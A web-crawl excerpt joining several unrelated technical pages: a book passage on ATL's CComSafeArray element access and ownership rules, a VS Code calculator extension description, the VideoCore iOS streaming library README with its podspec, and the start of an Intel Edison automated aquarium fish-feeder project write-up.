return S_OK; } When bCopy is TRUE, the caller maintains ownership of the strData BSTR parameter, because CComSafeArray will be working with its own private copy. When bCopy is FALSE, CComSafeArray takes ownership of the strData BSTR; the caller must not attempt to free it, or errors will occur when this element is accessed from the SAFEARRAY. The following code snippet demonstrates this important difference: BSTR bstr1 = ::SysAllocString(OLESTR("Go Longhorns!")); BSTR bstr2 = ::SysAllocString(OLESTR("ATL Rocks!")); CComSafeArray<BSTR> sa(5); sa.SetAt(2, bstr1, true); // sa generates its own copy of bstr1 sa.SetAt(3, bstr2, false); // sa assigns element to bstr2 ::SysFreeString(bstr1); // ok, sa still has a copy ::SysFreeString(bstr2); // wrong!!! we don't own bstr2 VARIANT elements in SAFEARRAYs require special handling as well. The code for the specialized version of SetAt for VARIANTs is very similar to that shown earlier for BSTR. The main differences are that the original element is cleared using VariantClear and the copy is performed using VariantCopyInd if bCopy is TRUE. The code that implements SetAt for IDispatch* and IUnknown* type elements is identical (okay, the variable names are differentpDisp for IDispatch* and pUnk for IUnknown*). In either case, the original interface pointer element is Release'd before assignment and then is AddRef'd if bCopy is trUE. Again, this means that the caller is transferring ownership of the interface pointer to the CComSafeArray if bCopy is FALSE and should not then call Release on the pointer passed to the SetAt method. CComSafeArray ultimately generates a call to Release on each element in the SAFEARRAY when the instance is destroyed, so improper handling leads to a double release of the interface pointer and the all-too-familiar exception as a reward. Both proper and improper interface pointer element assignment are demonstrated in the following code: IUnknown* pUnk1, pUnk2; // assign both pointers to refer to an object CComSafeArray<IUnknown*> sa(5); sa.SetAt(2, pUnk1, true); // sa calls AddRef on pUnk1 sa.SetAt(3, pUnk2, false); // sa assigns element to pUnk2 // without AddRefing pUnk1->Release(); // ok, refcount non-zero because // of sa AddRef pUnk2->Release(); // wrong!!! we don't own pUnk2 The remaining two methods for accessing SAFEARRAY elements apply to multidimensional SAFEARRAYs. MultiDimGetAt and MultiDimSetAt provide read-and-write access to SAFEARRAY elements housed in a multidimensional SAFEARRAY. Both methods are very thin wrappers on top of the SafeArrayGetElement and SafeArrayPutElement API functions, respectively. HRESULT MultiDimGetAt(const LONG *alIndex, T& t) { ATLASSERT(m_psa != NULL); return SafeArrayGetElement(m_psa, const_cast<LONG*>(alIndex), &t); } HRESULT MultiDimSetAt(const LONG *alIndex, const T& t) { ATLASSERT(m_psa != NULL); return SafeArrayPutElement(m_psa, const_cast<LONG*>(alIndex), _ATL_AutomationType<T>::GetT(t)); } The alIndex parameter specifies an array of SAFEARRAY indices. The first element in the alIndex array is the index of the rightmost dimension; the last element is the index of the leftmost dimension. You make use of these functions like this: // 2-D array with all dimensions // left-most dimension has 3 elements CComSafeArrayBound bound1(3); // right-most dimension has 4 elements CComSafeArrayBound bound2(4); // equivalent C-style array indices would be [3][4] CComSafeArrayBound rgBounds[] = { bound1, bound2 }; CComSafeArray<int> sa(rgBounds, 2); int rgIndElement1[] = { 0, 1 }; // access element at sa[1][0] int rgIndElement2[] = { 3, 2 }; // access element at sa[2][3] long lVal = 0; // retrieve value at sa[1][0] sa.MultiDimGetAt(rgIndElement1, lVal); // multiply value by 2 and store it // in element located at sa[2][3] sa.MultiDimSetAt(rgIndElement2, lVal*=2); CComSafeArray defines four operators that provide some syntactic convenience for accessing elements of a SAFEARRAY: const typename _ATL_AutomationType<T>::_typewrapper& operator[](int nIndex) const { return GetAt(nIndex); } typename _ATL_AutomationType<T>::_typewrapper& operator[](int nIndex) { return GetAt(nIndex); } const typename _ATL_AutomationType<T>::_typewrapper& operator[](LONG nIndex) const { return GetAt(nIndex); } typename _ATL_AutomationType<T>::_typewrapper& operator[](LONG nIndex) { return GetAt(nIndex); } As you can see, all these operators simply delegate to the GetAt accessor method, discussed in the previous section. They differ only in the type of index and whether the const qualifier is specified. These operators enable you to write code with CComSafeArray that looks very much like the code you use to manipulate C-style array elements. CComSafeArray<int> sa(5); ATLASSERT(sa[2] == 0); sa[2] = 17; ATLASSERT(sa[2] == 17); CComSafeArray also provides two cast operators. Both implementations are trivial, serving only to expose the encapsulated SAFEARRAY. Nevertheless, they provide some syntactic convenience in some situations, such as when you want to pass a CComSafeArray instance to a function that expects a SAFEARRAY*. operator const SAFEARRAY *() const { return m_psa; } operator LPSAFEARRAY() { return m_psa; } Unfortunately, CComSafeArray does not supply one operator: an overload of operator&. Without it, you can't use CComSafeArray as a wrapper for an out parameter like this: HRESULT CreateANewSafeArray( SAFEARRAY** ppsa ) { *ppsa = SafeArrayCreateVector(VT_I4, 1, 15 ); return S_OK; } HRESULT UseCreatedSafeArray( ) { CComSafeArray< int > sa; HRESULT hr = CreateANewSafeArray( &sa ); } The previous code will not compile but will fail with this error: error C2664: CreateANewSafeArray : cannot convert parameter 1 from ATL::CComSafeArray<T> *__w64 to SAFEARRAY ** with [ T=int ] Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast This use differs from most of the other ATL smart types, which let you do exactly this, but there's a good reason for the disparity. Imagine that the ATL team had included the overloaded operator&. What happens in this case? HRESULT CreateANewSafeArray( SAFEARRAY** ppsa ) { *ppsa = SafeArrayCreateVector(VT_BSTR, 1, 15 ); return S_OK; } HRESULT UseCreatedSafeArray( ) { CComSafeArray< int > sa; HRESULT hr = CreateANewSafeArray( &sa ); } The C++ compiler can't tell what the returned SAFEARRAY actually contains; that information is available only at runtime. The compiler would have to allow the conversion, and we now have a CComSafeArray<int> wrapping a SAFEARRAY that actually contains BSTRs. Nothing good can come of this, so the operator& overload was left out. Instead, you can do this: HRESULT UseCreatedSafeArray( ) { SAFEARRAY *psa = null; HRESULT hr = CreateANewSafeArray( &psa ); CComSafeArray< int > sa; sa.Attach( psa ); } The error will now be detected at runtime inside the CComSafeArray::Attach method. The GetSafeArrayPtr() method, mentioned earlier, explicitly retrieves a pointer to the stored SAFEARRAY. It can be used like this: HRESULT UseCreatedSafeArray( ) { CComSafeArray< int > sa; HRESULT hr = CreateANewSafeArray(sa.GetSafeArrayPtr()); } However, this use bypasses the runtime type check in the Attach method and is not recommended for this reason.
https://flylib.com/books/en/3.286.1.34/1/
CC-MAIN-2019-43
en
refinedweb
Ctrl+P Programmer's Calculator in Python for Visual Studio Code. This is an inline calculator to use inside any document view in Visual Studio Code. Use inside existing views (e.g. source files) for quick inline calculations or dedicate a blank/unsaved view to use as an embedded standalone calculator. Simply select an expression (or multiple expressions using multiple selections) and execute the calculator by pressing the keyboard shortcut and the selection(s) will be replaced by the result of the calculation. Alternatively, if there are no selections, the line of the cursor will be parsed and the result inserted on the line after it (also works with multiple cursors). This is useful when using it as a normal calculator to incrementally perform a sequence of calculations using the result of the previous calculation as input for the following calculation leaving each step in the series of calculations visible. Procapy supports any valid Python, and will reduce the result of any expression to a number (or an error string if something did not parse correctly). The default keyboard shortcuts are: In addition to the Python standard functions, math and cmath modules (the latter imported into the cmath namespace), Procapy adds the following functions that are useful in programming: These are similar to the built-in function int(x) which will truncate to an integer of unlimited width. In addition, the variable n is assigned a value matching the index of each selection. This can be used in mathematical expressions to form different results for each selection. Difference between two hex numbers: Same but truncated to 32bit unsigned range which reveals the two's complement encoding of the negative number: Division and addition: Same but adding truncation to 8bit unsigned of intermediate results: Interpretation of a positive hex number as unsigned integer: Same but showing truncatated to 32bit signed integer, revealing the value when interpreted as a two's complement encoding: Comparison operators return True/False in decimal mode and 0/1 in hex/binary/octal: Same but with truncation of intermediate result to 32bit unsigned integer: Mixed radix calculations: Bitwise operators (OR, NOT, AND, XOR): Shift operators: Boolean operators and (in)equality: Rounding: Icon designed by Freepik from Flaticon Initial release of Procapy
https://marketplace.visualstudio.com/items?itemName=thomasthorsendk.procapy
CC-MAIN-2019-43
en
refinedweb
VideoCore is a project inteded to be an audio and video manipulation and streaming graph. It currently works with iOS and periodic (live) sources. It is a work in progress and will eventually expand to other platforms such as OS X and Android. Contributors welcome! Table of Contents Setup CocoaPods Create a Podfile with the contents platform :ios, '6.0' pod 'VideoCore', '~> 0.2.0' Next, run pod install and open the xcworkspace file that is created. Sample Application The SampleBroadcaster project in the sample folder uses CocoaPods to bring in VideoCore as a dependency: cd sample/SampleBroadcaster pod install open SampleBroadcaster.xcworkspace … or you can build from the command-line: xcodebuild -workspace SampleBroadcaster.xcworkspace -scheme SampleBroadcaster build More on CocoaPods: Architecture Overview VideoCore’s architecture is inspired by Microsoft Media Foundation (except with saner naming). Samples start at the source, are passed through a series of transforms, and end up at the output. e.g. Source (Camera) -> Transform (Composite) -> Transform (H.264 Encode) -> Transform (RTMP Packetize) -> Output (RTMP) videocore/ sources/ videocore::ISource videocore::IAudioSource : videocore::ISource videocore::IVideoSource : videocore::ISource videocore::Watermark : videocore:IVideoSource iOS/ videocore::iOS::CameraSource : videocore::IVideoSource Apple/ videocore::Apple::MicrophoneSource : videocore::IAudioSource OSX/ videocore::OSX::DisplaySource : videocore::IVideoSource videocore::OSX::SystemAudioSource : videocore::IAudioSource outputs/ videocore::IOutput videocore::ITransform : videocore::IOutput iOS/ videocore::iOS::H264Transform : videocore::ITransform videocore::iOS::AACTransform : videocore::ITransform OSX/ videocore::OSX::H264Transform : videocore::ITransform videocore::OSX::AACTransform : videocore::ITransform RTMP/ videocore::rtmp::H264Packetizer : videocore::ITransform videocore::rtmp::AACPacketizer : videocore::ITransform mixers/ videocore::IMixer videocore::IAudioMixer : videocore::IMixer videocore::IVideoMixer : videocore::IMixer videocore::AudioMixer : videocore::IAudioMixer iOS/ videocore::iOS::GLESVideoMixer : videocore::IVideoMixer OSX/ videocore::OSX::GLVideoMixer : videocore::IVideoMixer rtmp/ videocore::RTMPSession : videocore::IOutput stream/ videocore::IStreamSession Apple/ videocore::Apple::StreamSession : videocore::IStreamSession Version History - 0.3.1 - Various bugfixes - Introduction of pixel buffer sources so you can add images to broadcast. - 0.3.0 - Improvements to audio/video timestamps and synchronization - Adds an incompatible API call with previous versions. Custom - graphs must now call IMixer::start() to begin mixing. - 0.2.3 - Add support for image filters - 0.2.2 - Fix video streaking bug when adaptative bitrate is enabled - Increase the aggressiveness of the adaptative bitrate algorithm - Add internal pixel buffer format - - 0.2.0 - Removes deprecated functions - Adds Main Profile video - Improves adaptive bitrate algorithm - 0.1.12 - Bugfixes - Red5 support - Improved Adaptive Bitrate algorithm - 0.1.10 - Bugfixes - Adaptive Bitrate introduced - 0.1.9 - Bugfixes, memory leak fixes - Introduces the ability to choose whether to use interface orientation or device orientation for Camera orientation. - 0.1.8 - Introduces VideoToolbox encoding for iOS 8+ and OS X 10.9+ - Adds -lc++ for compatibility with Xcode 6 - 0.1.7 - Add a simplified iOS API for the common case of streaming camera/microphone - Deprecate camera aspect ratio and position - Add a matrix transform for Position - Add a matrix transform for Aspect Ratio - Bugfixes - 0.1.6 - Use device orientation for CameraSource rather than interface orientation - 0.1.5 - Add aspect fill to CameraSource - 0.1.4 - Switch from LGPL 2.1 to MIT licensing. - Add Camera preview layer. - Add front/back camera toggle. - Fix aspect ratio bug in Camera source. - 0.1.3 - Update sample app with a more efficient viewport render - 0.1.2 - Fixes a serious bug in the GenericAudioMixer that was causing 100% cpu usage and audio lag. - 0.1.1 - Fixes Cocoapods namespace conflicts for UriParser-cpp - 0.1.0 - Initial CocoaPods version Latest podspec { "name": "VideoCore", "version": "0.3.2", "summary": "An audio and video manipulation and streaming pipeline with support for RTMP.", "description": " This is a work-in-progress library with then intention of being an audio and video manipulationn and streaming pipeline for iOS.n", "homepage": "", "license": "MIT", "authors": { "James Hurley": "[email protected]" }, "source": { "git": "", "tag": "0.3.2" }, "requires_arc": false, "header_dir": "videocore", "header_mappings_dir": ".", "source_files": [ "mixers/**/*.h*", "mixers/**/*.cpp", "mixers/**/*.m*", "rtmp/**/*.h*", "rtmp/**/*.cpp", "rtmp/**/*.m*", "sources/**/*.h*", "sources/**/*.cpp", "sources/**/*.m*", "stream/**/*.h*", "stream/**/*.cpp", "stream/**/*.m*", "system/**/*.h*", "system/**/*.cpp", "system/**/*.m*", "transforms/**/*.h*", "transforms/**/*.cpp", "transforms/**/*.m*", "api/**/*.h*", "api/**/*.m*", "filters/**/*.cpp", "filters/**/*.h*" ], "frameworks": [ "VideoToolbox", "AudioToolbox", "AVFoundation", "CFNetwork", "CoreMedia", "CoreVideo", "OpenGLES", "Foundation", "CoreGraphics" ], "libraries": "c++", "dependencies": { "boost": [ "~> 1.51.0" ], "glm": [ "~> 0.9.4.6" ], "UriParser-cpp": [ "~> 0.1.3" ] }, "xcconfig": { "HEADER_SEARCH_PATHS": "${PODS_ROOT}/boost" }, "platforms": { "ios": "5.0" } } Mon, 29 Feb 2016 05:15:03 +0000
https://tryexcept.com/articles/cocoapod/videocore
CC-MAIN-2019-43
en
refinedweb
Contains settings which indicate whether it is required to show only the Top N series points in a series, and define the rule to determine the Top N points. public class TopNOptions : ChartElement Public Class TopNOptions Inherits ChartElement The "Top N" feature is intended to visually represent only selected series points of a series, and is determined by the TopNOptions object returned by the SeriesBase.TopNOptions property. This feature is applied only if the SeriesBase.TopNOptions's Enabled property is set to true. If this feature is enabled, then the Mode property determines which property (Count, ThresholdValue or ThresholdPercent) specifies how many series points will be visible in a chart. All other series points are merged into a single "Others" point, which can be visible or hidden, according to the ShowOthers property value. The text shown as an argument of the "Others" point is specified by the OthersArgument property.. System.Object ChartElement TopNOptions
https://documentation.devexpress.com/CoreLibraries/DevExpress.XtraCharts.TopNOptions.class
CC-MAIN-2019-43
en
refinedweb
(Note:. You can follow his Windows PowerShell and other system administrator antics at. The first step in troubleshooting this script is to comment out the opening line: #$errorActionPreference = "silentlycontinue" The default value of $errorActionPreference in Windows PowerShell is continue. This means that upon hitting an error, Windows PowerShell will flag the error, but attempt to carry on processing the script. By commenting out the first line, which has changed the value of $errorActionPreference to silentlycontinue, we will be able to troubleshoot what is wrong with the script. If we now run the script again we get the following error: “You cannot call a method on a null-valued expression as seen below.” From the second line of the error, we can see that the issue is with line 4: $Shell.popup($w.UserName) The method is the part of the line after the dot so we know that for some reason the variable $Shell is empty. This is because in line 3, the variable used to store the wscript.shell ComObject has been named $wshShell. So to correct that, line 4 should look like this: $wshShell.popup($w.UserName) If we run the updated script again, we receive the below message box. No error this time, but it is empty. So we know that we can create a message box, but there must be something wrong with populating the text. This is again partly to do with the naming of variables. In line 1, we used $wmi to store the results of the WMI query to retrieve the currently logged-on user. This is the variable we need to use in the popup method to display the correct text. So line 3 should be further corrected: $wshShell.popup($wmi.UserName) However, running the script again still returns an empty message box. Going back to the original WMI query in line 1, if we run it interactively we get the below result: The value of the Name property is the name of the computer, not the logged on user. Also this property is not called UserName, which we are trying to use in line 4. By changing the WMI query to instead use the UserName property, we get the correct logged-on user: Get-WmiObject -Class Win32_computerSystem -Property UserName The corrected script now looks like this: Beginner10_Fixed.ps1 #$errorActionPreference = "silentlycontinue" $wmi = Get-WmiObject -Class Win32_computerSystem -Property UserName $wshShell = New-Object -ComObject wscript.shell $wshShell.popup($wmi.UserName) When we run this corrected script, the following message box is displayed. A slightly more advanced way to create a message box would be to use the message box class within the System.Windows.Forms .NET Framework namespace. While not providing much extra in this particular example, more complex forms could be created using these tools. You first need to load the system.windows.forms assembly (only a subset of the .NET Framework is available by default in Windows PowerShell): [reflection.assembly]::loadwithpartialname('system.windows.forms') | Out-Null Run the same WMI query as before: $wmi = Get-WmiObject -Class Win32_computerSystem -Property UserName Then use the show method of the system.windows.forms.messagebox class to display the message box: [system.Windows.Forms.MessageBox]::show($wmi.username) Beginner Event 10 (VBScript) Georges Maheu is the Premier Field Engineer (PFE) Security Technology Lead for Microsoft Canada. As a Senior PFE, he focuses on delegation of authority (how many domain administrators do you really have?), server hardening, and doing security assessments using his own scripts. Georges has a passion for VBScript, Windows PowerShell, and WMI and uses them on a regular basis to gather information from Active Directory and computers. Georges also delivers popular scripting workshops to Microsoft Premier Customers worldwide. ------------ VBScript solution On Error Resume Next Set wmi = GetObject("winmgmts:") colitems = wmi.Execquery("Select user from Win32_computersystem") For Each item In colitem WScript.Echo item.username This is a classic: a script written by someone else without comments. In this situation, the first thing I do after examining the source code is to double-click the script in a test environment. Personally, I use Virtual PC for all my script development and testing. Never run a script in production until you fully and totally understand what it does. Well, running this script did not help. Nothing seems to happen. My next reflex is to comment out the first line and to add the Option explicit statement to force variable declarations: ' On Error Resume Next 'GLM: commented out Option explicit ’GLM: added The apostrophe character is used to add comments or descriptive text in a VBScript. In this case, it will prevent the error-handling statement On error resume next from executing. On error resume next makes your scripts ignore errors (no error messages either) and move on to the next line. I could have deleted the line but I like to keep the original code around while I debug. I also add comments preceded by my initials, GLM. Now, when I run the script, I get this dialog box: As a best practice, all variables should be declared, and adding the Option explicit statement makes this mandatory. Variables are declared with the Dim statement. I add the following: Dim WMI I then repeat the process until all the variables are declared: Dim colItems Dim item During this process, I notice there is a typo in colItem. An s is missing at the end! colItems = wmi.Execquery("Select user from Win32_computersystem") ' For Each item In colItem 'original code For Each item In colItems 'GLM: modified At this point, the code looks like this: ") ' For Each item In colItem 'original code For Each item In colItems 'GLM: modified WScript.Echo item.username And I get the following error message: A search (using Bing) on “vbscript error 800A01C2” may give you an indication of what the problem could be. Fortunately, I found a webpage with a similar problem and remembered that the WMI ExecQuery requires a Set to work: ' colItems = wmi.Execquery("Select user from Win32_computersystem") 'original code Set colItems = wmi.Execquery("Select user from Win32_computersystem") 'GLM: modified Let’s run the code and see what happens. OK, another error. And I thought this was going to be easy. However, line #10 (For Each item In colItems) seems to be fine. One thing you learn quickly when you write or debug scripts is that errors sometimes occur in cascades. If you can’t find anything wrong with a particular line, it could be the error occurred in the code before the line in which the error was reported. The question is, where? WMI, which stands for Windows Management Instrumentation, is in some respect Microsoft’s implementation of WBEM, a standard created by DMTF. WMI uses WQL, a query language similar to SQL. Knowing this, I decided to replace the WQL query with the following: ' colItems = WMI.Execquery("Select user from Win32_computersystem") 'original code Set colItems = WMI.Execquery("Select * from Win32_computersystem") 'GLM: modified I did this because the “*” is like a wild card character and will return all the properties associated with the Win32_computerSytem class. Unlike PowerShell, there is no simple way to list properties in VBScript. You could write some code (review Scriptomatic source code for an example), but this would probably be more work than debugging this code! Another option is to use CIM Studio from the free WMI tools. CIM Studio will give you a complete list of all the properties and methods for a given class. With this information, I could also have rewritten the line to: Set colItems = WMI.Execquery("Select userName from Win32_computersystem") Let’s run the script one more time. Yes! It works. Here is the working script after our debugging session: ") 'original code Set colItems = WMI.Execquery("Select * from Win32_computersystem") 'GLM: modified ' For Each item In colItem 'original code For Each item In colItems 'GLM: modified WScript.Echo item.UserName I save this version as a reference and then clean the code. You will notice I removed the On Error Resume Next statement. Because I’m not doing any error handling, there is no point using this statement. Here is the final script with added comments: ShowLoggedUserAccount.vbs '* File: ShowLoggedUserAccount.vbs '* Version: 1.06 '* Date: 2010/04/06 '* Author: Georges Maheu, Microsoft PFE '* '* Based on the original file '* File: VBScriptDoesNotWOrk.vbs '* Version: 1.0 '* Date: 2010/03/21 '* Author: John Doe '* Modifications: documented in file Debug-VBScriptDoesNotWOrk.vbs ' ' This script will display the name of the current logged-on user ' on a local or remote computer ' ================================================================ Option Explicit 'make variable declaration mandatory Dim WMI 'WMI service object Dim colItems 'collection of items returned by WMI query Dim item 'individual item from the WMI collection variable colItems Dim computerName 'name of computer to query 'LocalHost can be replaced by a remote computer name or IP address 'must be run from an account with sufficient permissions to see the data computerName = "localhost" 'create WMI service object and connect to CIMv2 namespace on computerName Set WMI = GetObject("winmgmts:\\"+computerName+"\root\CIMv2") 'retrieve userName property from Win32_computerSystem WMI class set colItems = WMI.Execquery("Select userName from Win32_computersystem") 'WMI ExecQueries returns a SWbemObjectSet collection data structure 'even when there is only one item in the collection. For this reason 'we use the For Each construct to list the userName property For Each item In colItems 'iterate through collection WScript.Echo item.userName 'display user name on screen Just for fun, I also created a very short version of this script: WScript.Echo GetObject("winmgmts:").Execquery("Select * from Win32_computersystem").itemIndex(0).userName Did I read somewhere recently that this syntax: [reflection.assembly]::loadwithpartialname('system.windows.forms') | Out-Null was deprecated in favour of Add-Type? (referenced at the end of the PS section above). Would love to have that link handy for a reference. Perhaps the scripting personages can answer.
https://blogs.technet.microsoft.com/heyscriptingguy/2010/05/28/expert-solutions-beginner-event-10-of-the-2010-scripting-games/
CC-MAIN-2017-34
en
refinedweb
Scenario: for retrieving and updating the data on the Account Form. Requirements: - CRM 2011 - Visual Studio 2010 - CRM 2011 SDK Create a Silverlight Application Step by Step 1. Create a new Silverlight Project: a. Open Visual Studio 2010. b. Click File | New | Project. c. Under Installed Templates, click Visual C# | Silverlight and choose Silverlight Application. Name the project "SilverlightAccountPage". Click OK. d. Click Ok on the next window which will automatically create an Web project to host the Silverlight Application. 2. Add a TextBox and Buttons to the MainPage.xaml page. a. Within Solution Explorer right click on the MainPage.xaml page and choose View Designer. b. Click View|Toolbox. When the toolbox window opens click the pin icon to keep the window open. c. Find the TextBox control within the Toolbox window. Drag the TextBox control onto the MainPage.xaml. This creates a single Textbox on the page. d. Right click the TextBox control and choose Properties. The properties window will display on your right hand side. e. At the top of the Properties window change the name to txtAccountName. f. Find the Button control within the Toolbox window. Drag the Button control onto the MainPage.xaml page under the textbox. This creates a single Button on the page. g. Right click the Button control on the MainPage.xaml page and choose Properties. The properties window will display on your right hand side. h. At the top of the Properties window change the name to btnUpdateData and update the Content property to “Update Data”. i. Add one more button to the page with the name of btnSaveData and Content property of “Save Data”. 3. Add code to the Button’s Click Event. a. Double-Click the Set Data Button control on the MainPage.xaml page. This will take you to the MainPage.xaml.cs file where we can see the btnSetData_Click method. b. Add the following code within the btnSetData_Click code method. This updates the name attribute on the Account form. private void btnSetData_Click(object sender, EventArgs e) { //Update Account Name attribute on the form. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); xrm.Page.data.entity.attributes.get("name").setValue(txtAccountName.Text); } c. Double-Click the Save Data Button control on the MainPage.xaml page. This will take you to the MainPage.xaml.cs file where we can see the btnSaveData_Click method. d. Add the following code within the btnSetData_Click code method. This fires the save action similar to Save button on the form. private void btnSaveData_Click(object sender, EventArgs e) { //Fire Save method to commit form changes. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); xrm.Page.data.entity.save() } e. Add the following code within the MainPage method. This retrieves the current account name value when the page is loaded. public void MainPage() { InitializeComponent(); //Populate textbox with current account name value. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); txtAccountName.Text = xrm.Page.data.entity.attributes.get(“name”).getValue(); } 4. Add the Microsoft.CSharp assembly as reference. a. Locate the Solution Explorer, right-click References and choose Add Reference. b. In the Add Reference browser window, click the .NET tab. c. Choose Microsoft.CSharp, and click OK. d. Add the following using statements at the top of the Default.aspx.cs file. using System.Windows.Browser; e. The completed code should look similar to the following. using System; using System.Collections.Generic; using System.Linq; using System.Net; using System.Windows; using System.Windows.Controls; using System.Windows.Documents; using System.Windows.Input; using System.Windows.Media; using System.Windows.Media.Animation; using System.Windows.Shapes; using System.Windows.Browser; namespace SilverlightAccountPage { public partial class MainPage : UserControl { public MainPage() { InitializeComponent(); //Populate textbox with current account name value. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); txtAccountName.Text = xrm.Page.data.entity.attributes.get("name").getValue(); } private void btnSetData_Click(object sender, RoutedEventArgs e) { //Update Account Name attribute on the form with value from textbox. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); xrm.Page.data.entity.attributes.get("name").setValue(txtAccountName.Text); } private void btnSaveData_Click(object sender, RoutedEventArgs e) { //Fire Save method to commit form changes. dynamic xrm = (ScriptObject)HtmlPage.Window.GetProperty("Xrm"); xrm.Page.data.entity.save(); } } } f. Click Build|Build Solution. If everything is correct you will see it say Build Succeeded at the bottom of the Visual Studio Window. 5. Create the Silverlight Web Resource. a. Log into the CRM Website and navigate to Settings | Customizations | Customize the System. b. In the Solution Window Click Web Resources from the Components list on the left hand navigation. c. Click New. d. Populate the new Web Resource information. Name: /ClientBin/SilverlightAccountPage.xap Display Name: Silverlight Account Page Description: Silverlight Application that interacts with Account Form. Type: Silverlight (XAP) Language: English e. Click Save. f. Click the Browse Button and select the XAP file that was built within Visual Studio. Path may be similar to the following. i.e. C:\Users\<UserName>\Documents\Visual Studio 2010\Projects\Silverlight AccountPage.Web\ClientBin. g. Save the Web Resource. 6. Add Silverlight Web Resource to the Account Form. a. Log into the CRM Website and navigate to Settings | Customizations | Customize the System. b. In the Solution Window Expand Entities from the Components list on the left hand navigation. c. Expand Account from within the Entities List. d. Select Forms and Open the Main Form. e. Click the Insert Tab at the top of the form and choose Web Resource. f. Use the lookup to select the Silverlight web resource that we created in Step 5. g. Enter a Name and Label for the Web Resource and Click OK. h. Click Save on the Account Form. i. Click Publish on the Account Form. j. Open an Existing Account record from the Account view. The Silverlight web resource will be displayed once the Account Form opens. k. Change the Account name within the web resource textbox and click Set Data. The new name will be reflected on the form. l. Click the Save Data button and this will commit the change and refresh the form. You can find more information regarding related services we provide here. Great post Jeremy. 🙂 Thanks a lot. I was looking for example of the simple SilverLight Application. And It works fine. Thanks … i also was searching for steps to create a web resource in CRM 2011 this helps a lot It was working fine.bt when try to put that xap file in html it was not working? Please tell me the reason.. Can u please tell me how i display data from one account to xap hosted html web resources when i click on a button in ribbon of that account. And how to bind corresponding extra address data from one account to silverlight combobox? This helped me a lot. Thank you! Very Good Post thanks for this post,this is really hep full………… great post help me a lot Good Post… Got Some basic knowledge aboug Silverlight – CRM 2011 Integration Chance to learn on silverligth as webresource in CRM Great Post! Just what I was looking for Thanx for sharing this.Very helpful and easily understandable Thank you so much for sharing this. Very very good for bigginners. That is what I looking for.
https://blogs.msdn.microsoft.com/crminthefield/2011/06/23/how-to-create-a-silverlight-web-resource-that-interacts-with-crm-2011-forms/
CC-MAIN-2017-34
en
refinedweb
Things used in this project Story Looking after two aquariums isn't an easy job, especially for someone as forgetful as me. Sometimes, I'd forget to feed the fishies for several days until my mom would notice floating fish skeletons. Well, nowadays that never happens, because of the new AquaFeeder2.0 - a machine that feeds the fishes all by itself! Yes, AquaFeeder is fully automated; all you have to do is leave it on 24/7, and it will automatically feed the fish twice a day. It does everything on its own, from opening and closing the aquarium lid, to dropping fish food. It also keeps you updated with the details of the aquarium and itself through a webpage that can be accessed by any phone, tablet or computer on your WiFi network. AquaFeeder is a great machine that you could use if: - You are forgetful (like me) - You are busy and working all the time (like me) - You are on vacation and need to feed the fish when you aren't there. - You want the best care for your fishes. - You like making stuff instead of buying them (yeah, the true maker spirit \m/) This isn't actually my first ever automated fish feeder; I made AquaFeeder1.0 about 6 months ago (check out its instructable too!). Unfortunately, AquaFeeder 1.0 desperately needed a serious upgrade. You couldn't really be sure if it actually fed the fish at a particular time or it failed to do so. It also needed some user interface which could allow someone to access it remotely. AquaFeeder2.0 took care of those problems; it is equipped with the (incredibly powerful) Intel Edison, it now has inbuilt WiFi and Bluetooth and compatibility with several programming languages that unleashes a huge number of possibilities. Here are some of AquaFeeder 2.0's new features: - WiFi connectivity: Get data from AquaFeeder or control it through a webpage. - Email notifications: Sends you an email when it successfully feeds the fish. - WiFi synced time. With these features along with a better CPU and program, AquaFeeder is now closer to being a commercial product than a prototype. The bottom line: AquaFeeder2.0 is a vastly improved automated fish feeder that regularly feeds the fish all by itself, while using the sophisticated features of the Intel Edison to keep the user up to date with info about the aquarium and fish. Wanna see how exactly AquaFeeder works? Keep reading below! Step 1: How AquaFeeder Works... AquaFeeder's main job, simply put, is to feed the fish. For a machine, this actually isn't as simple as it sounds. How does AquaFeeder2.0 feed the fish? AquaFeeder has 2 user-set feeding times, which means it feeds the fishes twice a day. Whenever it's time to feed, one servo motor opens the aquarium lid, another servo drops the fish food into the water, and then the lid is closed again. Video: This video shows how AquaFeeder feeds the fish using its servo motors. The LCD display: When not feeding the fish, AquaFeeder's LCD displays the web synced time and it's IP address. The time to feed next and the previous time fed are also figured out and displayed on the LCD display for the user's convenience. OTHER FEATURES:- WiFi and Webpage: Using your browser (like Google Chrome or Safari), you can access AquaFeeder through a webpage. On this webpage, you can view details, such as the time to feed the fish next, the time previously fed etc. You can also set custom feeding times or tell AquaFeeder to feed the fish right now. Web Synced Time: The Edison obtains the current time from the NTP server (one of the many official time servers where computers and other IoT devices sync their time with). This is very convenient as you don't have to keep setting the time manually. This picture below gives a brief of how the Edison synchronises the time with the Internet using NTP (network time protocol). As shown above, the lcd displays the time and IP address. Step 2: About AquaFeeder 2.0 What's new in AquaFeeder 2.0? - Better automation: AquaFeeder 1.0 was an automated machine, but there were many problems. For example, 1 out of 8 times the feeding program would fail and the fish wouldn't be fed, maybe due to power loss or unusual behaviour of the servo motor. Also, it couldn't figure out if it had missed feeding the fish, or if it was off during the feeding time. AquaFeeder 2.0 has a better feeding algorithm that wouldn't let the servo motor take too large amounts of current. Even if it fails feeding completely due to a power failure, when it is switched on again, the program will feed the fish immediately after booting up. - Easier To Use: AquaFeeder 2.0 has a simple alphanumeric LCD screen (instead of a graphic LCD) which displays all important information at one glance. In the picture below AquaFeeder's LCD is showing the next time to feed and the time previously fed. Every few seconds the LCD displays different information. ×Drag and drop images or click to select some from your file systemThe LCD screen showing the time to feed the fish next, and the time previously fed...There are no buttons to fiddle around with. AquaFeeder is entirely controlled through the webpage on the local WiFi network, so anyone can access it from any place in the house on any device with considerable ease. - Better lid opening mechanism: Now much more sturdy, without the mess of double tape. - Powerful On-board Computer: The Intel Edison doesn't just run Arduino code, but can also run python, C, and nodejs. In English, it simply means that it's MUCH more powerful and sophisticated than AquaFeeder1.0. - Control AquaFeeder from any device, anywhere! - You can view details and set feeding times for AquaFeeder through a webpage on the local WiFi network! - See the tags on the images above to see the differences between AquaFeeder 1.0 and 2.0 side by side. Step 3: Project Materials and Details... Time Required: 2 weekends, if you work fast enough Cost: ~$120-$130 (including the 